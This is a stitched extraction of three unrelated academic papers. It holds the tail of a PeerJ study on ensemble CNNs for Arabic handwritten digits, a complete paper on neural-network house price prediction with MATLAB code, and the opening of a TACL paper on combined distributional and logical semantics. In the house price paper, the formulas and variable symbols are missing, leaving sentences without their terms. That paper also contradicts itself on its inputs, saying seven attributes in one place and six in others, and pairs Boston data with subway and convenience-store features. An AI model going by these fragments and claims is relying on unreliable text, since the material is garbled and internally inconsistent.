zoom_range, height_shift_range and width shift range parameters equal to 0.1. Other parameters were also tested, but invariably led to a worse performance of the augmented classifiers. It is known that not all forms of augmentation are necessarily helpful for all tasks (Mudhsh & Almodfer, 2017), and the tree chosen yield the best results for these AHR architectures. The batch size of augmented images had a size of 128. Ensemble selection Once VGG12, VGG12_aug, REGU and REGU_aug were trained, the idea was to combine their predictions into an averaged ensemble classifier (Simonyan & Zisserman, 2014). The two main approaches that could be used for this include averaging the predictions of each of the 4 networks that form ENS4, or using a maximum voting approach, where the biggest softmax probability between the four networks is taken as the answer. Both methods were initially used, with averaging eventually showing a better performance overall. As such, the output softmax probabilities of ENS4 are the average calculated from the outputs of VGG12, VGG12_aug, REGU and REGU_aug. Roughly, the process of training the entire ensemble, took about 2 h per run on the available hardware. GPU acceleration was used. Weight initialization Previous works in literature regarding AHR often don’t describe weight initialization strategies. For this study we have used Glorot-Normal initialization (Glorot & Bengio, 2010). On their work, Glorot and Bengio mention how this initialization often outperforms other normalized initializations. Indeed, this came to be the standard initialization for the Keras framework. For comparison, runs with He-Normal, Random normalized and All-zeroes initializations were performed. Preliminary tests showed that the standard Glorot-Normal initialization yielded better results, and so this was kept throughout the rest of the runs. RESULTS The optimizer swapping strategy described in the previous section, combined with the learning rate scheduling, produces a consistent behavior of convergence of the loss function with the training epochs. In the first twenty epochs, the Adam optimizer causes loss values to drop towards lower and more stable values, and on the next 20 epochs SGD brings these values to a lower, nearly constant minimum. An example of this behavior can be seen in Fig. 3, showing the plots for loss and accuracy over the training epochs. Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 8/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.167 Figure 3 Example of training and validation acurracy and loss as a function of training epochs. Each of the four individual networks that compose ENS4 are portrayed. Up to the 20th epoch, under Adam op- timization, the values gradually oscilate less. Notably when swapping to SGD at epoch 20 there is a slight improvement of performance (higher acurracy, lower loss), followed by a narrower convergence of the values. This behavior was consistent throughout all runs. Full-size DOI: 10.7717/peerjcs.167/fig-3 Table 1 Summary of results. Averaged test and validation accuracies with different cross- validation strategies. Entries in the table correspond to the individual networks (VGG12, REGU, VGG12_aug and REGU_aug) and ENS4. MCCV KCV 10fold KCV 6fold Accuracy (%) Standard Deviation (n%) Accuracy (%) Standard Deviation (n%) Accuracy (%) Standard Deviation (n%) Validation (MADbase) VGG12 99,56 0,05 99,60 0,06 99,62 0,05 REGU 99,61 0,05 99,58 0,06 99,58 0,08 VGG12_aug 99,63 0,05 99,59 0,06 99,62 0,06 REGU_aug 99,71 0,07 99,69 0,07 99,72 0,07 ENS4 99,74 0,06 99,73 0,05 99,74 0,07 Test (MADbase) VGG12 99,20 0,05 99,23 0,08 99,26 0,07 REGU 99,17 0,04 99,15 0,10 99,18 0,05 VGG12_aug 99,32 0,04 99,31 0,03 99,32 0,03 REGU_aug 99,37 0,04 99,40 0,06 99,39 0,05 ENS4 99,43 0,03 99,44 0,04 99,47 0,04 After the initial parameter tuning was performed with MADbase, the 26 experiments corresponding to 10 MCCV runs, 10 fold runs and six fold runs were performed. The averaged results are summarized in Table 1. The full raw results of the runs, used to calculate these averages, are presented as a supplemental file along the manuscript. Interestingly, the only case where one of the individual networks outperformed the full ensemble was for one of the REGU_aug results. Furthermore, REGU_aug consistently Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 9/13 https://peerj.com https://doi.org/10.7717/peerjcs.167/fig-3 http://dx.doi.org/10.7717/peerj-cs.167 outperformed VGG12_aug in all experiments with this dataset, even though the architecture is arguably much simpler (having effectively six layers compared to the 12 of VGG12). For MADbase, the maximum value of test accuracy was observed during one of the 10-fold tests: 99.52%. This result outperforms the 99.48% RBF SVM result reported Abdleazeem & El-Sherif (2008). The maximum validation accuracy was observed during one the MCCV runs: 99.86%, which outperforms the 99.66% validation accuracy reported by Mudhsh & Almodfer (2017). It was also observed that the final averaged test accuracy of 6-fold validation for MADbase was the best result among the three validation strategies. However it surpasses the other two by only 0.02%. In the MADbase test dataset of 10,000 images this corresponds to a difference of just two images. The difference in stdev is also small, of 0.01%. Overall this does not seem to show a clear best choice between MCCV and KCV validation strategies. As such, the AHCD dataset was studied using MCCV for parameter tuning. The validation and test accuracies were, respectively, 98.60% and 98.42%. These also meet and improve upon the state of the art values mentioned in ‘Introduction’. DISCUSSION Notably, standard deviation (stdev) of the results of 10 MCCV runs were lower than the standard deviation of either KCV. The only exceptions are for the ENS4 validation stdev, and the VGG12_aug test stdev. This seems to indicate that the MCCV yields less disperse validation and test accuracies for MADbase. The fact that REGU was observed to outperform VGG12 suggests the importance of batch normalization for this task. It was also observed that data augmentation resulted consistently in improvements for both validation and test accuracies. Furthermore, ensemble averaging resulted in higher validation and test accuracies while at the same time reducing the standard deviation over the number of the experiments performed. In terms of the validation and test accuracies, 10-fold cross-validation was consistently a worse performing metric compared to sixfold cross-validation and MCCV. Generally speaking whenever tenfold cross-validation was used for parameter tuning, the observed accuracies were in general worse. This is true for both validation and test accuracies. However for the most part, the observed differences were on the order of less than 10 misclassifications, which doesn’t justify preference for a particular validation strategy if it would be much more computationally costly than the alternative. The average test and validation accuracy values of ENS4 are very promising and improve upon the presently available state of the art listed in ‘Introduction’, for MADbase. The best test accuracy result of 99.52% indicates that ENS4 is the first classifier to outperform the accuracy value of 99.48% of the two stage RBF SVM classifier by Abdleazeem & El-Sherif (2008) for this dataset. Importantly, ENS4 achieves this in a single stage classification, with no previous feature extraction. Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 10/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.167 CONCLUSION A method for Offline Arabic Handwritten Recognition was described in this manuscript. The system was trained and tested on the two largest available datasets of Arabic digits and characters. The architecture used consisted of an ensemble averaging of four Convolutional Neural Networks. Of these four, two were inspired by VGGNet and two were written from scratch using batch normalization and dropout regularization. Each of these was trained twice: once with data augmentation, once without. The training used a swapping method where the first epochs use an adaptive optimizer (Adam) and the last epochs use regular stochastic gradient descent. It further used learning rate scheduling if the loss decrease reached a plateau during the SGD training epochs. Two validation strategies were considered: Monte Carlo Cross-Validation and K-fold Cross-validation. For the latter, two values of K were used, one commonly used in literature, and one that ensures the test and validation sets have the same size for the MADbase dataset. The results didn’t show a clear advantage of choosing either method for this dataset in particular. The use of a categorical cross-entropy loss function outperformed the use of a mean squared error function for the same purpose, possibly because of the choice of softmax activations for the final dense layer of the individual networks. Glorot-Normal weight initialization outperformed the other alternatives tested (He- Normal, All-zero, Random normalized). Future works could test initializations more exhaustively, to see if there is a particular combination of initializations that yield better results for AHR, although the results so far seem to indicate that other aspects of the architecture and training are more relevant to the end result. The results obtained improve upon the state of the art both the MADbase and AHCD datasets. The fact the ensemble averaging gives promising results suggests future projects could adapt other types of larger Convolution based Networks, or try different training strategies, while also adding them to ensemble averaging classifiers. Other types of ensemble averaging, such as weighted averages, could be explored more in depth for this purpose as well. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the National Council for Scientific and Technological Development of Brazil, through a PhD scholarship. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: National Council for Scientific and Technological Development of Brazil. Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 11/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.167 Competing Interests The authors declare there are no competing interests. Author Contributions • Iam Palatnik de Sousa conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: There are three supplemental files. The text file includes relevant specific details about the network architectures used in the manuscript. The Excel file includes the raw results from the experiments run in the manuscript. The ipynb file is the Pthon code notebook. The raw data (specific details about the network architectures used, raw results from the experiments run and the Python code notebook) is available as Supplemental Files. AHCD: https://www.kaggle.com/mloey1/ahcd1. MADbase: https://www.kaggle.com/mloey1/ahdd1/. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.167#supplemental-information. REFERENCES Abdelazeem S. 2009. Comparing Arabic and Latin handwritten digits recognition problems. World Academy of Science, Engineering and Technology 54:451–455. Abdleazeem S, El-Sherif E. 2008. Arabic handwritten digit recognition. International Journal of Document Analysis and Recognition 11(3):127–141 DOI 10.1007/s10032-008-0073-5. Alkhateeb JH, Alseid M. 2014. DBN—based learning for Arabic handwritten digit recognition using DCT features. In: 2014 6th international conference on Computer Science and Information Technology (CSIT). 222–226. El Melhaoui O, Maroc M, El Hitmy M, Lekhal F. 2011. Arabic numerals recognition based on an improved version of the loci characteristic. International Journal of Computer Applications 24(1):36–41 DOI 10.5120/2912-3830. El-Sawy A, Loey M, Hazem EB. 2017. Arabic handwritten characters recognition using convolutional neural network. WSEAS Transactions on Computer Research 5:11–19. Keskar NS, Socher R. 2017. Improving generalization performance by switching from Adam to SGD. ArXiv preprint. arXiv:1712.07628. Kingma DP, Ba J. 2014. Adam: a method for stochastic optimization. ArXiv preprint. arXiv:1412.6980. LeCun Y, Bottou L, Bengio Y, Haffner P. 1998. Gradient-based learning applied to docu- ment recognition. Proceedings of the IEEE 86(11):2278–2324 DOI 10.1109/5.726791. Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 12/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.167#supplemental-information https://www.kaggle.com/mloey1/ahcd1 https://www.kaggle.com/mloey1/ahdd1/ http://dx.doi.org/10.7717/peerj-cs.167#supplemental-information http://dx.doi.org/10.7717/peerj-cs.167#supplemental-information http://dx.doi.org/10.1007/s10032-008-0073-5 http://dx.doi.org/10.5120/2912-3830 http://arXiv.org/abs/1712.07628 http://arXiv.org/abs/1412.6980 http://dx.doi.org/10.1109/5.726791 http://dx.doi.org/10.7717/peerj-cs.167 Loey M, El-Sawy A, EL-Bakry H. 2017. Deep learning autoencoder approach for handwritten arabic digits recognition. ArXiv preprint. arXiv:1706.06720. Mahmoud SA. 2008. Arabic (Indian) handwritten digits recognition using Gabor-based features. In: Innovations in Information Technology, 2008. IIT 2008. International conference. Piscataway: IEEE, 683–687. Mudhsh M, Almodfer R. 2017. Arabic handwritten alphanumeric character recognition using very deep neural network. Information 8(3):105 DOI 10.3390/info8030105. Refaeilzadeh P, Tang L, Liu H. 2016. Cross-validation. Encyclopedia of Database Systems DOI 10.1007/978-0-387-39940-9_565. Salameh M. 2014. Arabic digits recognition using statistical analysis for end/conjunction points and fuzzy logic for pattern recognition techniques. World of Computer Science & Information Technology Journal 4(4). Selvi PP, Meyyappan T. 2013. Recognition of Arabic numerals with grouping and ungrouping using back propagation neural network. In: 2013 international conference on pattern recognition, informatics and mobile engineering (PRIME). Piscataway: IEEE, 322–327. Simonyan K, Zisserman A. 2014. Very deep convolutional networks for large-scale image recognition. ArXiv preprint. arXiv:1409.1556. Takruri M, Al-Hmouz R, Al-Hmouz A. 2014. A three-level classifier: fuzzy C means, support vector machine and unique pixels for Arabic handwritten digits. In: Computer Applications & Research (WSCAR), 2014 world symposium. Piscataway: IEEE, 1–5. Xu QS, Liang YZ. 2001. Monte Carlo cross validation. Chemometrics and Intelligent Laboratory Systems 56(1):1–11 DOI 10.1016/S0169-7439(00)00122-2. Younis KS. 2017. Arabic handwritten character recognition based on deep convolutional neural networks. Jordanian Journal of Computers and Information Technology 3(3). Palatnik de Sousa (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.167 13/13 https://peerj.com http://arXiv.org/abs/1706.06720 http://dx.doi.org/10.3390/info8030105 http://dx.doi.org/10.1007/978-0-387-39940-9_565 http://arXiv.org/abs/1409.1556 http://dx.doi.org/10.1016/S0169-7439(00)00122-2 http://dx.doi.org/10.7717/peerj-cs.167 work_vi7mhk6gg5gijkx2dieiskx6xu ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 DOI: 10.21307/ijanmc-2020-001 1 Research on House Price Prediction Based on Multi- Dimensional Data Fusion Yang Yonghui School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China E-mail: yangyh26@qq.com Abstract—The price of commercial housing is related to the process of urbanization in China and the living standard of residents, so the prediction of the price of commercial housing is very important. A major difficulty in predicting regression problems is how to handle different attribute types and fuse them. This paper proposes a house price prediction model based on multi-dimensional data fusion and a fully connected neural network. The model building steps are: First, normalize the data involved in the sample; then, interpolate the normalized data to increase the data density; subsequently, the normalized sample data is converted into a pixel matrix; finally, a fully connected neural network model is established from the pixel matrix to the price of the commercial house. After the neural network model has been established, the price of house can be obtained by entering the attributes of the house into the neural network model. Keywords-Multi-Dimensional Data Fusion; Fully Connected Neural Network Model; House Price Prediction I. INTRODUCTION Urbanization[1], also known as urbanization and urbanization, refers to the process of population gathering towards cities, the expansion of cities, and the series of economic and social changes that result from it. The essence is the changes in economic, social, and spatial structures. Modernization is the core proposition of China's modernization process and sustained economic growth. In recent years, with the further progress of China's urbanization process, more and more young people have begun to enter second-tier, third tier and even first-tier cities. A major factor affecting young people's entry into big cities is the price of local commercial housing. In other words, a major factor affecting China's urbanization process is the price of urban house. This shows that it is necessary to forecast house prices. The attributes that affect house prices are transaction date, house age, distance from the subway station, the number of convenience stores in the walking circle, the dimension of the house, and the longitude of the house. This paper will build a data fusion model. The input information of this model is the seven factors that affect house prices, and the output information is the price of commercial housing. After the data fusion model has been established, only the attributes that affect house prices are entered into the data fusion model, and the price of the commercial house can be obtained. A. Research Background and Significance With the development of China's economy, people's living standards have gradually improved, and economic development has made people have a higher pursuit of living places. According to data from the National Bureau of Statistics[2]: from January to December 2018, the investment in real estate development nationwide was 12,266.4 billion yuan, an increase of 9.5% over the previous year, and the growth rate was 0.2 percentage points lower than the January- November period, an increase from the same period of the previous year. 2.5 percentage points. Among them, residential investment was 8,529.2 billion yuan, an increase of 13.4%, a 0.2 percentage point drop from January to November, and an increase of 4 percentage points from the previous year. The proportion of residential investment in real estate development investment was 70.8%. With the increase in housing sales, housing prices have also increased. According to relevant data, China's housing prices have at least doubled from 2015. With the increase of house prices, people pay more attention to the prediction of house prices. This paper will build a data fusion model. The input information of this model is six attributes that affect house prices: transaction date, house age, distance from the subway station, the number of convenience stores in the walking circle, the dimension of the house, and the longitude of the house; the output is the price of the commercial house. After the data mailto:yangyh26@qq.com International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 2 fusion model has been established, only the six attributes that affect house prices are entered into the data fusion model, and the price of the commercial house can be obtained. The research of house price prediction based on multi-dimensional data fusion can provide reference for China's house price prediction and further promote the development of urbanization in China. B. Data sources The data in this paper comes from the Boston house price data provided by Kaggle, and the amount of data selected is relatively small. The data set contains 404 training samples and 102 test samples, for a total of 506 sample data. There are 6 attributes that affect house prices in house price forecasts. In the problem of house price prediction, the attributes that affect house prices are: transaction date , house age , distance from the subway station , the number of convenience stores in the walking circle , the dimension of the house , and the longitude of the house ; Dependent variable is house price . II. KEY TECHNOLOGY A. Research methods for regression problems House price forecasting is a forecasting problem, and forecasting problems are regression analysis. This section aims to state the research methods of regression analysis. Regression analysis[3] is a method of statistically analyzing data. The purpose is to understand whether two or more variables are related, the direction, and strength of the correlation and establish a mathematical model to observe specific variables to predict the variables of interest to researchers. The roles in regression analysis are independent and dependent variables: the independent variable is a variable that actively changes, for example, several factors that affect house prices in this paper are independent variables; the dependent variable is a passively generated due to changes in independent variables, such as housing prices in this paper, are a dependent variable. Regression analysis can also be understood as a method for analyzing the relationship between independent and dependent variables. The regression analysis methods are linear regression, logistic regression, and polynomial stepwise regression. Linear regression is a linear equation established between the independent variable and the dependent variable. This is the most well-known regression model. In this type of model, the independent variable may be discrete or continuous; the dependent variable must be continuous, and the nature of linear regression is linear. Logistic regression is a logistic equation built from independent variables to dependent variables. This is a regression model used to calculate the success or failure of an event. In this type of model, the independent variable may be discrete or continuous; the dependent variable must be in the interval [ ] . Polynomial regression is a polynomial equation established between the independent variable and the dependent variable. This is a polynomial regression model commonly used in the field of deep learning. Under this model, a low polynomial degree leads to underfitting, and a high polynomial degree leads to overfitting. When dealing with multiple independent variables, stepwise regression is needed[4]. Standard stepwise regression does two things, adding or removing independent variables at each step. In this technique, the selection of independent variables is done by means of an automated process, which does not involve manual intervention. B. Research methods for data fusion Data fusion[5] is a technology that fuses attribute values from different attributes. Fusion of multiple attributes will get better performance results than a single attribute. Data fusion is widely used in multidisciplinary and multi-scenario integration fields. For example, you can monitor the patient's physiological and psychological information through different hardware devices, and finally obtain the patient's physical condition through data fusion. There are many similar examples. There are also many difficulties in data fusion. The first is how to deal with different attributes, and the second is how to fuse the data. There are many difficulties in data fusion design. The first is how to handle different attribute types, and the second is how to fuse attributes. This thesis will detail the processing method of the attribute type in the "Handling of attribute types" Section and the data fusion method in the "Data Fusion" Section. C. Handling of attribute types The attribute type refers to the data type of the attribute. The attribute types are: Large_Attributes, Small_Attributes, Intermediate_Attributes, and Interval_Attributes[6]. 1) Large_Attributes The Large_Attributes are the larger the independent variable, the larger the dependent variable, that is, the independent variable will have a positive benefit on the dependent variable, in other words, there is a positive correlation between the dependent variable and the independent variable. The processing method for very large attributes is shown in (1). International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 3  (1) Among them, is the maximum value of the attribute value; is the minimum value of the attribute value; is the original value of the attribute value; is the normalized attribute value. 2) Small_Attributes The Small_Attributes refers to: the larger the independent variable, the smaller the value of the dependent variable, that is, the independent variable will have a negative benefit on the dependent variable, in other words there is a negative correlation between the independent variable and the dependent variable. The processing method of extremely small attributes is shown in (2).  (2) Among them, is the maximum value of the attribute value; is the minimum value of the attribute value; is the original value of the attribute value; is the normalized attribute value. After processing by the above method, the extremely small attributes have been transformed into extremely large attributes. 3) Intermediate_Attributes Intermediate_Attributes refer to the existence of a threshold. When the independent variable is smaller than the threshold, it displays the characteristics of Large_Attributes. When the independent variable is larger than the threshold, it displays the characteristics of Small_Attributes. Specifically, when the independent variable is less than the threshold, there is a positive correlation between the independent variable and the dependent variable; when the independent variable is greater than the threshold, there is a negative correlation between the independent variable and the dependent variable. The processing method of Intermediate_Attributes is shown in (3). {  (3) Among them, is the maximum value of the attribute value; is the minimum value of the attribute value; is the original value of the attribute value; is the normalized attribute value; is the threshold. After processing by the above method, the interval attribute has been transformed into Large_Attributes. 4) Enumerated_Attributes Enumerated_Attributes means that the attribute value of the independent variable does not have real measurement characteristics, and the result of the dependent variable will be affected by the value of the independent variable, but this influence relationship is difficult to express. The processing method of Enumerated_Attributes is as follows: Step1: List all the values of the input attributes; Suppose the input attribute contains attribute values: 、、…、 ; Step2: Convert the attribute value to One-Hot [7] form; Among them, is the attribute value, so a vector with only the position being 1 can be used instead. That is, can be expressed as: ( ) ； Among them, is the attribute value, so a vector with only the position being 1 can be used instead. That is, can be expressed as: ( ) ；…… Among them, is the attribute value, so a vector with only the position being 1 can be used instead. That is, can be expressed as: ( ) ； So far, all values of the attribute have been expressed as One-Hot form. D. Data Fusion This section analyzes the problem of data fusion, that is, how to merge Large_Attributes, Small_Attributes, Interval_Attributes, and Enumerated_Attributes together. This thesis will propose a pixel-based data fusion method: first establish a pixel matrix; then use a fully connected neural network model to process the pixel matrix. 1) Create a pixel matrix This section aims to transform multiple attributes into a pixel arrangement. Specifically, it is assumed that the sample contains samples and each sample contain attributes, that is, All values for the sample are: , , …, , …, , …, ; All values for the sample are: , , …, …, , …, ; International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 4 …… All values for the sample are: , …, …, …, . Then, the pixel matrix is:( ) ; and the pixel matrix is:( ) ; …… and the pixel matrix is:( ) . 2) Processing pixel matrix In "Create a pixel matrix", this article has already established the number of pixel matrices as the number of samples, and then we need to use the neural network to process the pixel matrix. The choice of network structure: there are many neural network model structures, such as fully connected layer neural networks, convolutional neural networks, long-short-term memory networks, and Residual network. Because the application scenario in this paper is simple, it is more appropriate to choose a fully connected neural network model. Selection of activation function: The activation function is a function that runs on the neuron and is responsible for mapping the input of the neuron to the output. The activation functions are: function (Figure 1 ), function (Figure 2 ), function (Figure 3 ), function (Figure 4 ), where is a special form of . Regarding the selection principle of the activation function, Andrew Ng gives the following reference scheme in “Neural Networks and Deep Learning”: is very common in machine learning. The activation function is generally defaulted to . is generally better than , but the scope of use of Wider; the activation function used in the output layer of the binary classification problem is , and was rarely used in other cases; is almost always better than . and have a disadvantage that when the independent variable is large, the slope is small. The gradient descent method is limited; except for the output layer, linear activation functions are rarely used; neural network models use activation functions, which will lead to the final result being a linear combination of input feature vectors. Figure 1. Sigmoid Figure 2. Tanh Figure 3. ReLU Figure 4. Leaky ReLU III. NORMALIZATION OF ATTRIBUTES This part needs to normalize the attributes involved in the data set: first analyze the data type of the attributes by "Attribute Analysis"; then normalize the attributes by "Normalization". International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 5 A. Attribute Analysis As mentioned in "Data Sources", the data in this paper is derived from Boston house price data provided by Kaggle, and the amount of data selected this time is relatively small. The data set contains 404 training samples and 102 test samples, for a total of 506 sample data. In the problem of house price prediction, there are 6 attributes that affect house prices: transaction date ; house age ; distance from the subway station ; the number of convenience stores in the walking circle ; the dimension of the house ; the longitude of the house ;. dependent variable: house price . Transaction date is a time variable; the house age is a Small_Attributes; distance from the subway station is a Small_Attributes; the number of convenience stores in the walking circle is a Large_Attributes; the dimension of the house and the longitude of the house are an Enumerated_Attributes. B. Normalization Transaction date is a time variable; the house age is a Small_Attributes; distance from the subway station is a Small_Attributes; the number of convenience stores in the walking circle is a Large_Attributes; the dimension of the house and the longitude of the house are an Enumerated_Attributes. IV. DATA FUSION In this part, the normalized data in "Normalization of attributes" needs to be fused: first, the pixel matrix is established by "Building a Pixel Matrix"; then the fully connected neural network model is established by "Building a Neural Network Model". A. Building a Pixel Matrix A pixel matrix can be established by "Data Fusion". As described in "Data sources", the data in this paper is derived from Boston house price data provided by Kaggle. The amount of data selected is small. The data set contains 404 training samples and 102 test samples, for a total of 506 sample data. Then there are: All values for the sample: ,…, ; All values for the sample: , , …, ; …… All values for the sample: , …, . B. Building a Neural Network Model The paper will eventually build a neural network model of house attributes to house prices: where the input attributes are house attributes: transaction date ; house age ; distance from the subway station ; the number of convenience stores in the walking circle ; the dimension of the house ; the longitude of the house ;output information is house price . Step1: Design the network structure Through the analysis of "Data Fusion", this paper will build a fully connected neural network model. The network model structure is shown in (Figure 5 Network structure): The input layer of the network structure contains 7 input nodes; the network structure contains 5 hidden layers, each of which contains 4 nodes; the output layer of the network structure contains 1 output node; all activation functions use function; Training period: 50000; Target accuracy is: ; Learning rate: 0.01 Figure 5. Network structure Step2: Selection of training tools There are many ways to train neural networks, such as Tensorflow, Caffe, MXNet, Torch, Theano in python, and nntool in Matlab. nntool is a network model training tool that is easy to deploy and simple in the environment. In this paper, the neural network model shown in (Figure 5 Network structure) is trained by nntool (Figure 6 nntool). Figure 6. Nntool International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 6 Step3: Code design See Appendix Step4: Training process In the process of neural network training using Matlab, part of the training process is shown in (Figure7 Training process). Among them, Performance is shown in (Figure 8 Performance); Training State is shown in (Figure9 Training State); Regression is shown in (Figure10 Regression). Figure 7. Training process Figure 8. Performance Figure 9. Training State Figure 10. Regression Step5: Results The results of the neural network model include two parts: one is the partial result display, as shown in (Figure11 Result); the other is the error proportion chart, as shown in (Figure12 error_raph). As can be seen from the (Figure10 Regression), the accuracy of the network model is 97.87%. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 7 Figure 11. Result Figure 12. Error_raph V. SUMMARY This paper finally established a neural network model from house attributes to house prices: where the input attributes are commodity house attributes: transaction date ; house age ; distance from the subway station ; the number of convenience stores in the walking circle ; the dimension of the house ; the longitude of the house ;output information is house price .After the neural network model has been established, Enter the six attributes of the commercial house into this neural network model, and you can get the corresponding house price. The accuracy of the network model is 97.87%. VI. APPENDIX [pn,minp,maxp,tn,mint,maxt]=premnmx(p,t); NodeNum1 =4; NodeNum2=4; NodeNum3=4; NodeNum4=4; NodeNum5=4; TypeNum = 1; TF1 = 'tansig'; TF2 = 'tansig'; TF3 = 'tansig'; TF4 = 'tansig'; TF5 = 'tansig'; TF6 = 'tansig'; net=newff(minmax(pn),[NodeNum1,NodeNum2,N odeNum3,NodeNum4,NodeNum5,TypeNum],{TF1 TF2 TF3 TF4 TF5 TF6},'traingdx'); %traingdm net.trainParam.show=50; net.trainParam.epochs=50000; net.trainParam.goal=1e-5; net.trainParam.lr=0.01; net=train(net,pn,tn); p2n=tramnmx(ptest,minp,maxp); an=sim(net,p2n); [a]=postmnmx(an,mint,maxt) plot(1:length(t),t,'o',1:length(t)+1,a,'+'); title('o:predictive_value--- *:actual_value') grid on m=length(a); t1=[t,a(m)]; error=t1-a; figure plot(1:length(error),error,'-.') title('error_graph') grid on International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 8 REFERENCES [1] Lee W C, Cheong T S, Wu Y. The Impacts of Financial Development, Urbanization, and Globalization on Income Inequality: A Regression- Based Decomposition Approach [J]. SSRN Electronic Journal, 2017. [2] Tan Paul. House prices have been stagnant [J]. Journalist observation, 2019 (4). [3] Gogtay N J, Deshpande S P, Thatte U M. Principles of Regression Analysis [J]. The Journal of the Association of Physicians of India, 2017, 65(4):48-52. [4] Gooch J W. Stepwise Regression [J]. Encyclopedic Dictionary of Polymers, 2011. [5] Bleiholder J, Naumann F. Data fusion [J]. ACM Computing Surveys, 2008, 41(1):1-41. [6] Han Zhonggeng. Mathematical model for comprehensive evaluation and prediction of Yangtze River water quality [J]. Journal of Engineering Mathematics (7): 69-79. [7] Shuntaro Okada, Masayuki Ohzeki, Shinichiro Taguchi. Efficient partition of integer optimization problems with one-hot encoding[J]. Scientific Reports, 2019, 9(1). [8] Wang Zhaoqing, Lu Xiaoyang. A Macro Element Method for Solving Potential Problems Based on Mean Value Interpolation [J]. Journal on Numerical Methods and Computer Applications (3): 21-29. [9] Hershey S, Chaudhuri S, Ellis D P W, et al. CNN architectures for large-scale audio classification[C]// 2017. work_vqm2sxewfjcnxp754zqhb4frdm ---- Edinburgh Research Explorer Combined Distributional and Logical Semantics Citation for published version: Lewis, M & Steedman, M 2013, 'Combined Distributional and Logical Semantics', Transactions of the Association for Computational Linguistics, vol. 1, pp. 179-192. <http://aclweb.org/anthology//Q/Q13/Q13- 1015.pdf> Link: Link to publication record in Edinburgh Research Explorer Document Version: Peer reviewed version Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 http://aclweb.org/anthology//Q/Q13/Q13-1015.pdf http://aclweb.org/anthology//Q/Q13/Q13-1015.pdf https://www.research.ed.ac.uk/portal/en/publications/combined-distributional-and-logical-semantics(2aae1bb8-66ff-474c-be0d-3b829573bbbc).html Transactions of the Association for Computational Linguistics, 1 (2013) 179–192. Action Editor: Johan Bos. Submitted 1/2013; Revised 3/2013; Published 5/2013. c©2013 Association for Computational Linguistics. Combined Distributional and Logical Semantics Mike Lewis School of Informatics University of Edinburgh Edinburgh, EH8 9AB, UK mike.lewis@ed.ac.uk Mark Steedman School of Informatics University of Edinburgh Edinburgh, EH8 9AB, UK steedman@inf.ed.ac.uk Abstract We introduce a new approach to semantics which combines the benefits of distributional and formal logical semantics. Distributional models have been successful in modelling the meanings of content words, but logical se- mantics is necessary to adequately represent many function words. We follow formal se- mantics in mapping language to logical rep- resentations, but differ in that the relational constants used are induced by offline distri- butional clustering at the level of predicate- argument structure. Our clustering algorithm is highly scalable, allowing us to run on cor- pora the size of Gigaword. Different senses of a word are disambiguated based on their in- duced types. We outperform a variety of ex- isting approaches on a wide-coverage question answering task, and demonstrate the ability to make complex multi-sentence inferences in- volving quantifiers on the FraCaS suite. 1 Introduction Mapping natural language to meaning representa- tions is a central challenge of NLP. There has been much recent progress in unsupervised distributional semantics, in which the meaning of a word is in- duced based on its usage in large corpora. This ap- proach is useful for a range of key applications in- cluding question answering and relation extraction (Lin and Pantel, 2001; Poon and Domingos, 2009; Yao et al., 2011). Because such a semantics can be automically induced, it escapes the limitation of de- pending on relations from hand-built training data, knowledge bases or ontologies, which have proved of limited use in capturing the huge variety of mean- ings that can be expressed in language. However, distributional semantics has largely de- veloped in isolation from the formal semantics liter- ature. Whilst distributional semantics has been ef- fective in modelling the meanings of content words such as nouns and verbs, it is less clear that it can be applied to the meanings of function words. Semantic operators, such as determiners, negation, conjunc- tions, modals, tense, mood, aspect, and plurals are ubiquitous in natural language, and are crucial for high performance on many practical applications— but current distributional models struggle to capture even simple examples. Conversely, computational models of formal semantics have shown low recall on practical applications, stemming from their re- liance on ontologies such as WordNet (Miller, 1995) to model the meanings of content words (Bobrow et al., 2007; Bos and Markert, 2005). For example, consider what is needed to answer a question like Did Google buy YouTube? from the following sentences: 1. Google purchased YouTube 2. Google’s acquisition of YouTube 3. Google acquired every company 4. YouTube may be sold to Google 5. Google will buy YouTube or Microsoft 6. Google didn’t takeover YouTube All of these require knowledge of lexical seman- tics (e.g. that buy and purchase are synonyms), but some also need interpretation of quantifiers, nega- tives, modals and disjunction. It seems unlikely that 179 distributional or formal approaches can accomplish the task alone. We propose a method for mapping natural lan- guage to first-order logic representations capable of capturing the meanings of function words such as every, not and or, but which also uses distributional statistics to model the meaning of content words. Our approach differs from standard formal seman- tics in that the non-logical symbols used in the log- ical form are cluster 